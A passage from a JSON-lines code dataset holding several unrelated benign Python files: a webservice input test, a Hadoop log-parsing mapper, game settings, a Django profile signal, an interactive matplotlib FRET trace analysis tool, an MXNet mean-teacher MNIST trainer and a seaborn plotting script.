\"user_age\": 50,\n        \"heart_rate\": 100\n    }\n\n    output_10 = check_input(input_10)\n    assert output_10 is False\n\n    input_11 = {\n        \"user_email\": \"suyash@suyashkumar.com\",\n        \"user_age\": \"fifty\",\n        \"heart_rate\": 100\n    }\n\n    with pytest.raises(ValueError):\n        check_input(input_11)\n\n    # math.sqrt(-100) itself raises ValueError, so build the input inside the context\n    with pytest.raises(ValueError):\n        input_12 = {\n            \"user_email\": \"suyash@suyashkumar.com\",\n            \"user_age\": 50,\n            \"heart_rate\": math.sqrt(-100)\n        }\n        check_input(input_12)\n","sub_path":"test_webservice.py","file_name":"test_webservice.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"169997906","text":"#!/usr/bin/python\n\n# %h is the IP address of the client\n# %l is identity of the client, or \"-\" if it's unavailable\n# %u is username of the client, or \"-\" if it's unavailable\n# %t is the time that the server finished processing the request. The format is [day/month/year:hour:minute:second zone]\n# %r is the request line from the client (in double quotes). It contains the method, path, query-string, and protocol of the request.\n# %>s is the status code that the server sends back to the client. You will mostly see status codes 200 (OK - The request has succeeded), 304 (Not Modified) and 404 (Not Found). See more information on status codes in W3C.org\n# %b is the size of the object returned to the client, in bytes. It will be \"-\" in case of status code 304.\n#\n# 10.223.157.186 - - [15/Jul/2009:15:50:35 -0700] \"GET /assets/js/lowpro.js HTTP/1.1\" 200 10469\n# %h %l %u %t \\\"%r\\\" %>s %b\n\nimport sys\n\n\nclass CommonLogLine:\n\n    def __init__(self, line):\n        line = line.strip()\n\n        self.ip = ''\n        self.identity = ''\n        self.username = ''\n        self.timestamp = ''\n        self.method = ''\n        self.path = ''\n        self.querystring = ''\n        self.protocol = ''\n        self.status = 0\n        self.size = 0\n\n        try:\n            ini, end = line.split(' [', 1)\n        except:\n            return\n\n        self.timestamp, end = end.split('] \"', 1)  # timestamp\n        self.ip, ini = ini.split(' ', 1)  # ini -> identity + username\n\n        request, end = end.split('\" ')\n        try:\n            request = request.split(' ')  # ignore: \"LIMIT 0\"\n            self.method = request[0]\n            self.path = request[1]\n            self.protocol = request[-1]\n        except Exception as e:\n            raise Exception(str(e), request, line)\n\n        status, size = end.split(' ')\n        self.status = int(status)\n        self.size = 0 if size == '-' else int(size)\n\n    def __str__(self):\n        lst = []\n        if any(self.ip):\n            lst.append('ip=%s' % self.ip)\n        if any(self.identity):\n            lst.append('identity=%s' % self.identity)\n        if any(self.username):\n            lst.append('username=%s' % self.username)\n        if any(self.timestamp):\n            lst.append('ts=%s' % self.timestamp)\n        if any(self.method):\n            lst.append('method=%s' % self.method)\n        if any(self.path):\n            lst.append('path=%s' % self.path)\n        if any(self.querystring):\n            lst.append('qs=%s' % self.querystring)\n        if any(self.protocol):\n            lst.append('protocol=%s' % self.protocol)\n        if self.status > 0:\n            lst.append('status=%d' % self.status)\n        if self.size > 0:\n            lst.append('size=%d' % self.size)\n        \n        return ', '.join(lst)\n    \n    \nfor line in sys.stdin:\n\n    line = CommonLogLine(line)\n    if not line.path:\n        continue\n\n    print('{0}\\t1'.format(line.path))\n","sub_path":"courses/udacity/hadoop.and.mapreduce/project.01/part.02/01.hits.to.page/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"493844927","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb  1 11:44:41 2016\r\n\r\n@author: pilgrim\r\n\"\"\"\r\n\r\nclass Settings():\r\n    '''a class to store all settings for alien invasion'''\r\n    def __init__(self):\r\n        '''init game settings'''\r\n        #screen settings\r\n        self.scrn_width = 1200\r\n        self.scrn_hgt = 800\r\n        self.bgcolor = (0, 0, 81)\r\n        #ship settings\r\n        self.ship_speed = 1.5\r\n        #bullet settings\r\n        self.torpedo_speed = 1\r\n        self.torpedo_width = 3\r\n        self.torpedo_height = 15\r\n        self.torpedo_color = (0, 204, 0)\r\n        self.torpedo_number = 3\r\n        self.comet_number = 5\r\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"253152796","text":"from django.db.models.signals import post_save\n\nfrom django.contrib.auth.models import User\nfrom .models import Profile\n\n\ndef create_profile(sender, instance, created, **kw):\n    if created:\n        user = instance\n        Profile.objects.create(\n            user=user,\n        )\n\n\npost_save.connect(create_profile, sender=User)\n","sub_path":"users/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"491207371","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 27 23:12:58 2019\r\n\r\n@author: iason\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport sys\r\n\r\nsys.path.append('../traceAnalysis - Ivo')\r\nimport traceAnalysisCode as analysis\r\nimport pandas as pd\r\nimport os\r\nimport itertools\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.widgets\r\nimport seaborn as sns\r\nfrom cursor_matplotlib import SnaptoCursor\r\n#plt.rcParams['toolbar'] = 'toolmanager'\r\n#from matplotlib.backend_tools import ToolBase\r\n#mainPath = r'D:\\ivoseverins\\SURFdrive\\Promotie\\Code\\Python\\traceAnalysis\\twoColourExampleData\\HJ A'\r\n\r\n\r\nclass InteractivePlot(object):\r\n    def __init__(self, file):\r\n        self.file = file\r\n        self.mol_indx = 0  #From which molecule to start the analysis\r\n        # See if there are saved analyzed molecules\r\n        self.file.importExcel(filename=self.file.name+'_steps_data.xlsx')\r\n\r\n    def plot_initialize(self):\r\n        sns.set(style=\"dark\")\r\n        sns.set_color_codes()\r\n        plt.style.use('dark_background')\r\n        self.fig, self.axes = plt.subplots(2, 1, sharex=True, figsize=(10,5))\r\n        self.fig.canvas.set_window_title(f'Dataset: {self.file.name}')\r\n\r\n        plt.subplots_adjust(bottom=0.23)\r\n\r\n        # Create the axes for the widgets\r\n        self.rax = plt.axes([0.91, 0.65, 0.08, 0.15])\r\n\r\n        self.axcheckfret = plt.axes([0.91, 0.35, 0.08, 0.08])\r\n        self.axcorred = plt.axes([0.95, 0.6, 0.028, 0.06])\r\n        self.axcorgreen = plt.axes([0.95, 0.53, 0.028, 0.06])\r\n        self.axcorrfretI = plt.axes([0.95, 0.3, 0.028, 0.06])\r\n        self.axthrsliders = [plt.axes([0.26, 0.072, 0.10, 0.03]),\r\n                             plt.axes([0.26, 0.033, 0.10, 0.03])]\r\n        # Create the buttons\r\n        self.axthresb = plt.axes([0.1, 0.03, 0.13, 0.062])  # Button to calculate dwell times by thresholding\r\n        self.axrejb = plt.axes([0.41, 0.03, 0.07, 0.062])  # Button to reject calculated dwell times by thresholding\r\n        self.axclearb = plt.axes([0.51, 0.03, 0.11, 0.062])  # Button to clear the clicked points (clears vlines)\r\n        self.axthrowb = plt.axes([0.64, 0.03, 0.11, 
0.062]) # Button to throw away already calculated dwell times and de-select molecule\n self.axconclb = plt.axes([0.77, 0.03, 0.15, 0.062]) # Button to conlcude analysis by saving all the calculated steps and metadata\n\n self.axnextb = plt.axes([0.17, 0.90, 0.065, 0.062]) # Buttons to cycle through molecules\n self.axprevb = plt.axes([0.083, 0.90, 0.08, 0.062])\n [ax.set_frame_on(False) for ax in self.fig.get_axes()[2:]]\n # Radiobutton to select red or green\n self.radio = matplotlib.widgets.RadioButtons(self.rax, (\"red\", \"green\"))\n self.radio.circles[0].set_color(\"r\")\n for circle in self.radio.circles: # adjust radius here. The default is 0.05\n circle.set_radius(0.07)\n self.radio.on_clicked(self.radio_manage)\n\n # Connect clicking to draw lines class\n self.draw = Draw_lines(self.fig, self.radio)\n self.fig.canvas.mpl_connect('button_press_event', self.draw.onclick)\n # Create the buttons with\n\n bp = {'color': 'black', 'hovercolor': 'gray'}\n self.bauto = matplotlib.widgets.Button(self.axthresb,'autoThreshold' , **bp)\n self.bauto.on_clicked(self.autoThreshold_plot)\n self.brejauto = matplotlib.widgets.Button(self.axrejb,'reject' , **bp)\n self.brejauto.on_clicked(self.auto_reject)\n self.bclear = matplotlib.widgets.Button(self.axclearb,'clear clicks' , **bp)\n self.bclear.on_clicked(self.draw.clear_all)\n self.bthrow = matplotlib.widgets.Button(self.axthrowb,'throw away' , **bp)\n self.bthrow.on_clicked(self.throw_away)\n self.bconcl = matplotlib.widgets.Button(self.axconclb,'conclude analysis' , **bp)\n self.bconcl.on_clicked(self.conclude_analysis)\n self.bnext = matplotlib.widgets.Button(self.axnextb,'Next' , **bp)\n self.bnext.on_clicked(self.save_molecule)\n self.bprev = matplotlib.widgets.Button(self.axprevb,'Previous' , **bp)\n self.bprev.on_clicked(self.save_molecule)\n\n # A checkbutton for fret autothreshold dwell-time calculation\n self.checkbfret = matplotlib.widgets.CheckButtons(self.axcheckfret, [\"E fret\"],\n actives=[False])\n self.checkbfret.rectangles[0].set_color(\"black\")\n self.checkbfret.rectangles[0].set_height( 0.2)\n [line.remove() for line in self.checkbfret.lines[0]]\n self.checkbfret.on_clicked(self.check_fret)\n\n # Entryboxes for offset corrections\n corrdict = {'initial': str(0), 'color':'k', 'hovercolor': \"k\", 'label_pad':.2}\n corrlabels = [r'$I_{R_{off}}$', r'$I_{G_{off}}$', r'$I_{min}$']\n corraxes = [self.axcorred, self.axcorgreen, self.axcorrfretI]\n self.correntries = [matplotlib.widgets.TextBox(ax, label, **corrdict)\n for ax, label in zip(corraxes, corrlabels)]\n [entry.on_submit(lambda _: self.plot_molecule()) for entry in self.correntries]\n\n # Sliders for assigning the threshold\n self.thrsliders = []\n self.thrsliders.append(matplotlib.widgets.Slider(self.axthrsliders[0], label=r\"$I_R$\", valmin=0,\n valmax=500, valinit=100, valfmt=\"%i\", color=\"r\"))\n self.thrsliders.append(matplotlib.widgets.Slider(self.axthrsliders[1], label=r\"$E$\", valmin=0,\n valfmt=\"%.2f\", valinit=0.5, color=\"b\", valmax=1.0))\n [slider.vline.remove() for slider in self.thrsliders]\n\n self.fig.show()\n plt.pause(0.1)\n\n def plot_molecule(self, draw_plot=True):\n #clear the appropriate axes first\n [ax.clear() for ax in self.fig.get_axes()[:2]]\n # find the current molecule instance\n self.mol = self.file.molecules[self.mol_indx]\n\n # Check if molecule is selected\n if self.mol.isSelected: self.select_molecule(toggle=False)\n #load saved steps\n self.load_from_Molecule()\n # load kon if existing or assign a False 3x3 boolean\n self.prev_mol = 
self.file.molecules[self.mol_indx - 1]\n if all(kon is None for kon in [self.mol.kon_boolean, self.prev_mol.kon_boolean]):\n\n self.kon = np.zeros((3,3), dtype=bool)\n elif self.mol.kon_boolean is None:\n self.kon = np.copy(self.prev_mol.kon_boolean) # if no kon is defined for current molecule\n else:\n self.kon = self.mol.kon_boolean\n # update the edge color from self.kon:\n self.load_edges(load_fret=True)\n\n self.axes[0].set_title(f\"Molecule: {self.mol.index} /{len(self.file.molecules)}\")\n self.Iroff, self.Igoff, self.Imin = [float(c.text) for c in self.correntries]\n\n self.red = self.mol.I(1, Ioff=self.Iroff)\n self.green = self.mol.I(0, Ioff=self.Igoff)\n self.fret = self.mol.E(Imin=self.Imin)\n self.exp_time = self.file.exposure_time\n self.time = np.arange(0,len(self.red)*self.exp_time, self.exp_time)\n\n if not draw_plot:\n return\n\n self.axes[0].plot(self.time, self.green, \"g\", lw=.75)\n self.axes[0].plot(self.time, self.red, \"r\", lw=.75)\n\n self.axes[1].plot(self.time, self.fret, \"b\", lw=.75)\n self.axes[1].set_ylim((0,1.1))\n self.axes[1].set_xlim((-10, self.time[-1]))\n self.axes[1].set_xlabel(\"time (s)\")\n # vertical lines to indicate the threshold in the two axes\n self.slidel = [ax.axhline(0, lw=1, ls=\":\", zorder=3, visible=False) for ax in self.axes]\n # Creat cursor particular to the molelcule and connect it to mouse movement event\n self.cursors = []\n self.cursors.append(SnaptoCursor(self.axes[0], self.time, self.red))\n self.cursors.append(SnaptoCursor(self.axes[0], self.time, self.green))\n self.cursors.append(SnaptoCursor(self.axes[1], self.time, self.fret))\n self.connect_events_to_canvas()\n self.fig.canvas.draw()\n plt.pause(0.1)\n\n def connect_events_to_canvas(self):\n self.fig.canvas.mpl_connect('key_press_event', self.key_bind)\n self.fig.canvas.mpl_connect('motion_notify_event', self.mouse_cursor)\n for cursor in self.cursors:\n self.fig.canvas.mpl_connect('axes_leave_event', cursor.leave_axis)\n self.fig.canvas.mpl_connect('axes_leave_event',\n lambda _: [[self.slidel[i].set_visible(False), self.fig.canvas.draw()] for i in [0,1]])\n\n def key_bind(self, event):\n k = event.key\n if k == 'a': self.autoThreshold_plot(event, find_all=False)\n if k == 'ctrl+a': self.autoThreshold_plot(event, find_all=True)\n elif k in ['left', 'right']: self.save_molecule(event, move=True)\n elif k == 'z': self.auto_reject(event)\n elif k == 'c': self.draw.clear_all(event)\n elif k in [',', '.', '/']: self.select_edge(k)\n elif k == ' ': self.select_molecule(toggle=True)\n elif k == 'r': self.radio_manage('red')\n elif k == 'g': self.radio_manage('green')\n elif k == 'e': self.check_fret('E')\n elif k == 't': self.throw_away(event)\n\n self.fig.canvas.draw()\n\n def load_from_Molecule(self):\n if self.mol.steps is None:\n return\n else:\n s = self.mol.steps\n [self.axes[0].axvline(f, zorder=0, lw=0.65, label=\"saved r\")\n for f in s.time[s.trace == 'red'].values]\n [self.axes[0].axvline(f, zorder=0, lw=0.65, label=\"saved g\")\n for f in s.time[s.trace == 'green'].values]\n [self.axes[1].axvline(f, zorder=0, lw=0.65, label=\"saved E\")\n for f in s.time[s.trace == 'E'].values]\n\n def select_molecule(self, toggle=True, deselect=False):\n if toggle:\n self.mol.isSelected = not self.mol.isSelected\n elif deselect:\n self.mol.isSelected = False\n else:\n self.mol.isSelected = True\n title = f'Molecule: {self.mol.index} /{len(self.file.molecules)}'\n title += ' selected'*(self.mol.isSelected)\n rgba = matplotlib.colors.to_rgba\n c = rgba('g')*self.mol.isSelected + 
rgba('w')*(not self.mol.isSelected)\n self.axes[0].set_title(title, color=c)\n self.fig.canvas.draw()\n\n def throw_away(self, event):\n if self.mol.steps is not None:\n self.mol.steps = None\n lines = self.axes[0].get_lines() + self.axes[1].get_lines()\n [l.remove() for l in lines if l.get_label().split()[0] in ['man', 'thres', 'saved']]\n self.select_molecule(toggle=False, deselect=True)\n self.fig.canvas.draw()\n\n\n def save_molecule(self, event=None, move=True, draw=True):\n # Assume acceptance of auto matically found and manually selected dwell times\n lines = self.axes[0].get_lines() + self.axes[1].get_lines()\n lines = [l for l in lines if l.get_label().split()[0] in [\"man\", \"thres\"]]\n self.mol.kon_boolean = self.kon\n if lines:\n if len(lines) % 2 != 0:\n print(f'Found an odd number of steps. Molecule {self.mol.index} not added')\n return\n if self.mol.steps is None:\n self.mol.steps = pd.DataFrame(columns=['time', 'trace', 'state',\n 'method','thres'])\n self.mol.isSelected = True\n\n for l in lines:\n method = l.get_label().split()[0]\n thres = \"N/A\"*(method=='man') + str(self.thrsliders[0].val)*(method =='thres')\n\n d = {'time': l.get_xdata()[0], 'trace': l.get_label().split()[1],\n 'state': 1, 'method': method, 'thres': thres}\n\n self.mol.steps= self.mol.steps.append(d, ignore_index=True)\n self.mol.steps.drop_duplicates(inplace=True)\n kon = [f'{int(i)}' for i in self.mol.kon_boolean.flatten()]\n kon = ''.join(kon)\n if 'kon' not in self.mol.steps.columns:\n kon = pd.DataFrame.from_records([{\"kon\": kon}])\n self.mol.steps = pd.concat([self.mol.steps, kon], axis=1)\n self.mol.steps.fillna(value='-')\n else:\n self.mol.steps.loc[0, 'kon'] = kon\n\n if move:\n if event.inaxes == self.axnextb or event.key in ['right']:\n if self.mol_indx > len(self.file.molecules):\n self.mol_indx = 1\n else:\n self.mol_indx += 1\n elif event.inaxes == self.axprevb or event.key in ['left']:\n self.mol_indx -= 1\n\n self.plot_molecule(draw_plot=draw)\n\n def conclude_analysis(self, event=None, save=True):\n # Save current molecule if it was analyzed\n self.save_molecule(move=False)\n # Concatenate all steps dataframes that are not None\n mol_data = [mol.steps for mol in self.file.molecules if mol.steps is not None]\n if not mol_data:\n print('no data to save')\n return\n keys = [f'mol {mol.index}' for mol in self.file.molecules if mol.steps is not None]\n steps_data = pd.concat(mol_data, keys=keys)\n if save:\n print(\"steps saved\")\n writer = pd.ExcelWriter(f'{self.file.name}_steps_data.xlsx')\n steps_data.to_excel(writer, self.file.name)\n writer.save()\n\n\n def autoThreshold_plot(self, event=None, find_all=False):\n self.auto_reject()\n # Find the steps for the checked buttons\n sel = self.radio.value_selected\n color = self.red*bool(sel == \"red\") + self.green*bool(sel == \"green\") # Select red or green\n steps = self.mol.find_steps(color, threshold=self.thrsliders[0].val)\n l_props = {\"lw\": 0.75, \"zorder\": 5, \"label\": \"thres \"+sel}\n [self.axes[0].axvline(s*self.exp_time, **l_props) for s in steps[\"start_frames\"]]\n [self.axes[0].axvline(s*self.exp_time, ls=\"--\", **l_props) for s in steps[\"stop_frames\"]]\n if self.checkbfret.get_status()[0]:\n steps = self.mol.find_steps(self.fret, threshold=self.thrsliders[1].val)\n l_props = {\"lw\": 0.75, \"zorder\": 5, \"label\": \"thres E\"}\n [self.axes[1].axvline(s*self.exp_time, **l_props) for s in steps[\"start_frames\"]]\n [self.axes[1].axvline(s*self.exp_time, ls=\"--\", **l_props) for s in steps[\"stop_frames\"]]\n 
self.fig.canvas.draw()\n if find_all:\n for mol in self.file.molecules:\n self.autoThreshold_plot(find_all=False)\n print(f'Analyzed mol {self.mol.index} /{len(self.file.molecules)}')\n e = matplotlib.backend_bases.KeyEvent('key_press_event', self.fig.canvas, 'right')\n if mol != self.file.molecules[-1]:\n self.save_molecule(event=e, move=True, draw=False)\n elif mol == self.file.molecules[-1]:\n self.conclude_analysis()\n return\n\n def auto_reject(self, event=None):\n for ax in self.axes:\n lines = ax.get_lines()\n [l.remove() for l in lines if l.get_label().split()[0] == 'thres']\n self.fig.canvas.draw()\n\n def mouse_cursor(self, event):\n if not event.inaxes :\n self.fret_edge_lock = True\n return\n ax = event.inaxes\n if ax == self.axes[0]:\n self.fret_edge_lock = True\n self.fig.canvas.mpl_connect('motion_notify_event', self.cursors[0].mouse_move)\n self.fig.canvas.mpl_connect('motion_notify_event', self.cursors[1].mouse_move)\n\n rad = self.radio.value_selected\n i = ['red', 'green'].index(rad)\n t, I = self.cursors[i].ly.get_xdata(), self.cursors[i].lx.get_ydata()\n try:\n labels = [rf\"t = {t:.1f}, $I_R$ = {I:.0f}\", rf\"t = {t:.1f}, $I_G$ = {I:.0f}\"]\n self.cursors[i].txt.set_text(labels[i])\n except TypeError:\n pass\n self.fig.canvas.draw()\n\n elif ax == self.axes[1]:\n self.fret_edge_lock = False\n self.fig.canvas.mpl_connect('motion_notify_event', self.cursors[-1].mouse_move)\n t, E = self.cursors[-1].ly.get_xdata(), self.cursors[-1].lx.get_ydata()\n try:\n self.cursors[-1].txt.set_text(f\"t = {t:.1f}, E = {E:.2f}\")\n except TypeError:\n pass\n self.fig.canvas.draw()\n\n elif ax in self.axthrsliders:\n indx = int(ax == self.axthrsliders[1]) # gives 0 if ax is upper (I) plot, 1 if ax is lower (E) plot\n self.slidel[indx].set_ydata(self.thrsliders[indx].val)\n self.slidel[indx].set_visible(True)\n self.fig.canvas.draw()\n\n\n def radio_manage(self, label):\n def update_slider(color, label):\n s = self.thrsliders[0]\n s.poly.set_color(color); s.label.set(text=label)\n\n indx = int(label == 'green') # 1 if green, 0 if red\n self.axes[0].get_lines()[not indx].set_zorder((not indx)+2)\n self.axes[0].get_lines()[indx].set_zorder(indx)\n self.radio.circles[indx].set_color(label[0])\n self.radio.circles[not indx].set_color(\"black\")\n update_slider(label[0], r\"$I_G$\"*bool(indx)+r\"$I_R$\"*bool(not indx))\n # Check the edge colors and set to white if not selected color\n sel = self.radio.value_selected\n selcol = matplotlib.colors.to_rgba(sel[0])\n spcol = [self.axes[0].spines[s].get_edgecolor() for s in ['left','bottom','right']]\n if selcol not in spcol:\n [self.axes[0].spines[s].set_color('white') for s in ['left','bottom','right']]\n\n self.load_edges()\n\n def load_edges(self, load_fret=False): # loads edge color from kon array\n sel = self.radio.value_selected\n kons = [self.kon[int(sel == 'green')]] ; colors = [sel[0]]\n if load_fret: kons.append(self.kon[2]) ;colors.append('blueviolet')\n\n for i, kon in enumerate(kons):\n selected_sides = list(itertools.compress(['left','bottom','right'], kon))\n unselected_sides = list(itertools.compress(['left','bottom','right'], np.invert(kon)))\n [self.axes[i].spines[s].set_color(colors[i]) for s in selected_sides]\n [self.axes[i].spines[s].set_color('white') for s in unselected_sides]\n\n self.fig.canvas.draw()\n\n def select_edge(self, key):\n if self.fret_edge_lock:\n ax = self.axes[0]\n sel = self.radio.value_selected[0] # get the selected color of the radiobutton\n elif not self.fret_edge_lock:\n ax = self.axes[1]\n sel = 
'blueviolet' # this refers to the fret color\n\n side = 'left'*(key == ',') + 'bottom'*(key == '.') + 'right'*(key == '/')\n\n spcolor = ax.spines[side].get_edgecolor()\n selcol, w = matplotlib.colors.to_rgba(sel), matplotlib.colors.to_rgba('white')\n c = selcol*(spcolor == w) + w*(spcolor == selcol)\n ax.spines[side].set_color(c)\n\n self.update_kon(sel, selcol, side, ax)\n\n def update_kon(self, sel=None, selcol=None, side=None, ax=None):\n i = ['r', 'g', 'blueviolet'].index(sel) # These are the colors of the sides. blueviolet refers to fret\n j = ['left', 'bottom', 'right'].index(side)\n self.kon[i][j] = (ax.spines[side].get_edgecolor() == selcol)\n\n\n def check_fret(self, label):\n if self.checkbfret.get_status()[0]:\n self.checkbfret.rectangles[0].set_color(\"b\")\n elif not self.checkbfret.get_status()[0]:\n self.checkbfret.rectangles[0].set_color(\"black\")\n self.fig.canvas.draw()\n\nclass Draw_lines(object):\n def __init__(self, fig, iplot_radio):\n self.lines = []\n self.fig = fig\n self.radio = iplot_radio # The InteractivePlot instance\n\n def onclick(self, event):\n if self.fig.canvas.manager.toolbar.mode != '': # self.fig.canvas.manager.toolmanager.active_toggle[\"default\"] is not None:\n return\n if event.inaxes is None:\n return\n ax = event.inaxes\n if event.button == 1:\n if ax == self.fig.get_axes()[0] or ax == self.fig.get_axes()[1]:\n sel = self.radio.value_selected*(ax == self.fig.get_axes()[0])\n sel = sel + \"E\"*(ax == self.fig.get_axes()[1])\n l = ax.axvline(x=event.xdata, zorder=0, lw=0.65, label=\"man \"+sel)\n self.lines.append(l)\n\n if event.button == 3 and self.lines != []:\n self.lines.pop().remove()\n self.fig.canvas.draw()\n\n def clear_all(self, event):\n while self.lines:\n self.lines.pop().remove()\n self.fig.canvas.draw()\n\n\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n#mainPath = './traces'\nmainPath = './simulations'\nexp = analysis.Experiment(mainPath, 0.1)\ni = InteractivePlot(exp.files[0])\ni.plot_initialize()\ni.plot_molecule()\n#plt.show()\n\n\n#self.fig.canvas.manager.toolmanager.add_tool('Next', NextTool)\n#self.fig.canvas.manager.toolbar.add_tool('Next', 'foo')\n#class NextTool(ToolBase, InteractivePlot):\n# '''Go to next molecule'''\n# default_keymap = 'enter, right'\n# description = 'Next Molecule 1'\n#\n# def trigger(self, *args, **kwargs):\n# pass\n# InteractivePlot.__init__(InteractivePlot, self.file)\n# print(self.mol_indx\n# )\n# InteractivePlot.plot_setup(InteractivePlot)\n# print(InteractivePlot.mol)","sub_path":"interactive_analysis_v3.1.py","file_name":"interactive_analysis_v3.1.py","file_ext":"py","file_size_in_byte":21470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"343577337","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 14 12:46:58 2018\n\n@author: bdus\n\nbaseline:\nhttps://github.com/bdus/programpractice/blob/master/mxnet/mnist_semi/supervised/experiments/finetune/train_finetune.py\n\nmean teacher are better role model\n\n\"\"\"\n\n\nimport _init_paths\n\nimport os\nimport mxnet as mx\nimport numpy as np\nfrom gluoncv import model_zoo as mzoo\n\nfrom mxnet import autograd, gluon, init, nd\nfrom mxnet.gluon import nn, loss as gloss\n\nfrom symbols import symbols\n\nbatch_size = 100\nstochastic_ratio = 0.01\n\nctx = mx.cpu() #[mx.gpu(i) for i in range(num_gpus)] if num_gpus > 0 else [mx.cpu()]\n\n# get data csv\ntransform=lambda data, label: (data.reshape(784,).astype(np.float32)/255, label)\ntrain_data = 
gluon.data.DataLoader(dataset= gluon.data.vision.MNIST(train=True,transform=transform), batch_size=100,shuffle=True,last_batch='discard')\nval_data = gluon.data.DataLoader(dataset= gluon.data.vision.MNIST(train=False,transform=transform), batch_size=100,shuffle=False)\n\n\n# network\nmodelname = 'semi_mt_simple2'\n\nbasemodel_zoo = 'simple2'\nnet_s = symbols.get_model(basemodel_zoo)\nnet_t = symbols.get_model(basemodel_zoo)\n#net_s.initialize(mx.init.Xavier(magnitude=2.24))\n#net_t.initialize(mx.init.Xavier(magnitude=2.24))\nnet_t.load_parameters( os.path.join('symbols','para','%s_t.params'%(modelname)) )\nnet_s.load_parameters( os.path.join('symbols','para','%s_s.params'%(modelname)) )\n\n#net.load_parameters(os.path.join('symbols','para','%s.params'%(modelname)))\n\n# g(x) : stochastic input augmentation function\ndef g(x):\n return x + nd.random.normal(0,stochastic_ratio,shape=x.shape)\n\n\n# loss function\nl_logistic = gloss.SoftmaxCrossEntropyLoss()\nl_l2loss = gloss.L2Loss() \nmetric = mx.metric.Accuracy()\n\ndef net_liner(net,net2,x1,x2,b):\n # net.para = x1 * net2.para + x2 * net.para + b\n for (k, v) , (k2, v2) in zip( net.collect_params().items() , net2.collect_params().items() ):\n v.set_data(v2.data() * x1 + v.data() * x2 + b)\n \n# train\ndef test():\n metric = mx.metric.Accuracy()\n for data, label in val_data:\n X = data.reshape((-1,1,28,28))\n #img = nd.concat(X,X,X,dim=1)\n output = net_t(X)\n metric.update([label], [output])\n return metric.get()\n \ndef train(epochs,alpha=0,beta=0,lr=0.1):\n #net.initialize(mx.init.Xavier(magnitude=2.24))\n print('ems_alpha = %f, consis_beta = %f ,lr = %f'%(alpha,beta,lr))\n trainer = gluon.Trainer(net_s.collect_params(),'sgd',{'learning_rate':lr})\n for epoch in range(epochs):\n metric.reset()\n for i, (X, y) in enumerate(train_data):\n X = nd.array(X)\n X = X.reshape((-1,1,28,28)) \n y = nd.array(y)\n #y = nd.one_hot(y,10) \n with autograd.record():\n y_s = net_s(g(X)) \n y_t = net_t(g(X)) \n L = l_logistic(y_s,y) + beta * l_l2loss(y_s,y_t)\n L.backward()\n trainer.step(batch_size)\n # net_t = alpha * net_t + (1-alpha) * net_s\n # alpha == 0 : copy student ; \n net_liner(net_t,net_s,1-alpha,alpha,0)\n #metric.update(y,y_t)\n #if i % 50 == 0:\n #name, acc = metric.get()\n #print('[Epoch %d Batch %d] Training: %s=%f'%(epoch, i, name, acc))\n metric.update(y,y_t)\n name, acc = metric.get()\n print('[Epoch %d] Training: %s=%f'%(epoch, name, acc))\n name, val_acc = test()\n print('[Epoch %d] Validation: %s=%f'%(epoch, name, val_acc)) \n if epoch % 10 == 0:\n net_t.save_parameters( os.path.join('symbols','para','%s_t.params'%(modelname)) )\n net_s.save_parameters( os.path.join('symbols','para','%s_s.params'%(modelname)) )\n net_t.save_parameters( os.path.join('symbols','para','%s_t.params'%(modelname)) )\n net_s.save_parameters( os.path.join('symbols','para','%s_s.params'%(modelname)) )\n\nif __name__ == '__main__':\n num_epochs = 10\n alpha = 0\n beta = 0\n train(20)\n for i in range(10):\n train(10,beta=0.1*i)\n for i in range(10):\n train(10,alpha=0.01*i, beta=0.1*i)\n for i in range(10):\n train(10,alpha=0.01*i, beta=1) \n train(100,alpha=0.1,beta=1)\n train(100,alpha=0.01,beta=1,lr=0.1)\n train(100,alpha=0.01,beta=1,lr=0.01)\n ","sub_path":"mxnet/mnist_semi/semi/train_mt.py","file_name":"train_mt.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"649328625","text":"\"\"\"\nUsed to make a summary plot of network properties and 
classification accuracy\n\"\"\"\n\nimport glob\nimport os\nimport sys\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom params import *\n\n# parameters have to be tweaked manually\nintra_mode = 'unimodal'\ninter_mode = 'unimodal'\nPATH = os.getcwd() + '/data/sum/'\nxticks = [\"M0\", \"M1\", \"M2\", \"M3\"] # xlabels are module indices\n\n\n\n\"\"\"\nmeasures figures\n\"\"\"\n# load data and melt in an appropriate format\nmeasures = pd.read_csv(PATH + 'measures_intra={}_inter={}.csv'.format(intra_mode, inter_mode), keep_default_na=False)\nmetrics = measures.columns[1:] # 4 different metrics, first column is indices\nmeasures['network type'] = pd.Categorical(measures['network type'], categories=['noise', 'random', 'topo'])\nmeasures = measures.melt(id_vars=['module index', 'network type', 'intra type', 'intra params', 'inter type',\n                                  'inter params'], var_name='metric').sort_values(by=['network type', 'module index'])\nprint(measures)\n\n# plot\nsns.set(font_scale=1.5)\ng = sns.FacetGrid(measures, col=\"metric\", row=\"network type\", hue='network type',\n                  sharex=True, sharey='col', margin_titles=False)\ng.map_dataframe(sns.lineplot, \"module index\", 'value', style='intra params', legend='full')\n\n# ticks and labels\nylabels = [\"Pearson CC\", \"LvR\", \"spikes/sec\", \"Fano factor\"] # ylabels are units of metrics\nfor row_i in range(3):\n    for ax_i, ax in enumerate(g.axes[row_i]):\n        ax.set(title=None, ylabel=None)\nfor ax_i, ax in 